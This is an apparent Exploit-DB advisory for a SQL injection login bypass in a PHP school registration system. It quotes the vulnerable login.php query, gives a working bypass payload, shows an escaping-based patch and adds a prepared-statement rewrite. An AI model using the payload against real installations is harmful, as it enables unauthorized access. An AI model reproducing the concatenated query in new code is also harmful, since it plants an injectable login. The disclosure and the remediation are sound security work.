Vendor: School Registration and Fee System
By: opt1lc
CVSS: 7.5 (HIGH)
Category: Authentication Bypass
CWE: 89
Product Name: School Registration and Fee System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: XAMPP
2016

School Registration and Fee System Auth Bypass

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' and 'password' parameters of the 'login.php' script. A remote attacker can bypass authentication and gain access to the application.

Mitigation:

The vulnerability can be mitigated by using the mysql_real_escape_string() function to sanitize user-supplied input.

Exploit-DB raw data:

# Exploit Title.............. School Registration and Fee System Auth Bypass
# Google Dork................ N/A
# Date....................... 01/11/2016
# Exploit Author............. opt1lc
# Vendor Homepage............ http://www.sourcecodester.com/php/10932/school-registration-and-fee-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/hemedy99/bilal_final.zip
# Version.................... N/A
# Tested on.................. XAMPP
# CVE........................ N/A

# File....................... bilal_final/login.php
---------------------------------------------------

		----snip----

		$username = $_POST['username'];
		$password = $_POST['password'];
		/* student */
		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
		$result = mysql_query($query)or die(mysql_error());
		$row = mysql_fetch_array($result);
		----snip----

---------------------------------------------------

Exploit 
-------
You can log in with the username and password: administrator' or '1'='1


Patching
-------
You can use one of PHP's functions, mysql_real_escape_string(), to
---------------------------------------------------

		----snip----

		$username = mysql_real_escape_string($_POST['username']);
		$password = mysql_real_escape_string($_POST['password']);
		/* student */
		$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
		$result = mysql_query($query)or die(mysql_error());
		$row = mysql_fetch_array($result);
		----snip----

---------------------------------------------------
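The advisory's fix keeps string concatenation and relies on mysql_real_escape_string(), which belongs to the legacy mysql extension (deprecated in PHP 5.5, removed in PHP 7.0). The following is an added example, not the advisory's or the vendor's code, showing the same login.php fragment rebuilt with PDO prepared statements so the submitted values never become part of the SQL text; it covers both the Mitigation paragraph above and the Patching snippet. The table and column names (users, username, password) come from the advisory; the DSN, database credentials, the assumption that the password column holds password_hash() digests rather than plaintext, and the post-login redirect target are assumptions for illustration.

```php
<?php
// Added example (not the advisory's or vendor's code): hardened replacement for
// the login.php fragment quoted above. Assumed: DSN/credentials, that the
// `password` column stores password_hash() digests, and the index.php redirect.
declare(strict_types=1);

// PDO with emulation disabled sends the statement and the parameters to the
// server separately, so there is no escaping step that can be forgotten.
function connect(): PDO
{
    return new PDO(
        'mysql:host=127.0.0.1;dbname=bilal_final;charset=utf8mb4', // assumed DSN
        'app_user',                                               // assumed user
        'app_password',                                           // assumed password
        [
            PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
        ]
    );
}

/**
 * Look up a user by name only; the password is never part of the SQL at all.
 * The bound value is matched literally, so an input such as
 * "administrator' or '1'='1" is just a username that finds no row.
 */
function findUser(PDO $pdo, string $username): ?array
{
    $stmt = $pdo->prepare(
        'SELECT id, username, password FROM users WHERE username = :username'
    );
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

/**
 * Compare the submitted password against the stored password_hash() digest
 * (assumption: hashes, not the plaintext the original query implies).
 * The verify step always runs so that response time does not reveal whether
 * the username exists.
 */
function authenticate(PDO $pdo, string $username, string $password): bool
{
    $row = findUser($pdo, $username);
    // Dummy digest used when there is no such user, to keep timing uniform.
    $storedHash = $row['password'] ?? password_hash('', PASSWORD_DEFAULT);
    $matches = password_verify($password, $storedHash);
    return $row !== null && $matches;
}

// Request handling equivalent to the original fragment's $_POST reads.
$username = (string)($_POST['username'] ?? '');
$password = (string)($_POST['password'] ?? '');

// Basic shape check before touching the database; length bound is assumed.
if ($username === '' || $password === '' || strlen($username) > 64) {
    http_response_code(400);
    exit('Missing or invalid credentials');
}

$pdo = connect();
if (authenticate($pdo, $username, $password)) {
    session_start();
    session_regenerate_id(true);   // new session id on login (no fixation)
    $_SESSION['user'] = $username;
    header('Location: index.php'); // assumed post-login page
    exit;
}

http_response_code(401);
exit('Invalid username or password');
```

The important difference from the page's patch is structural rather than a matter of escaping: the query string in findUser() is fixed at prepare time, so no value of $_POST['username'] can change its grammar, and the password leaves the SQL entirely in favour of a hash comparison in PHP.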

Credit
-------
This vulnerability was discovered and researched by opt1lc

Shout
-------
My Beautiful Daughter & My Wife

Reference
-------
http://php.net/manual/en/function.mysql-real-escape-string.php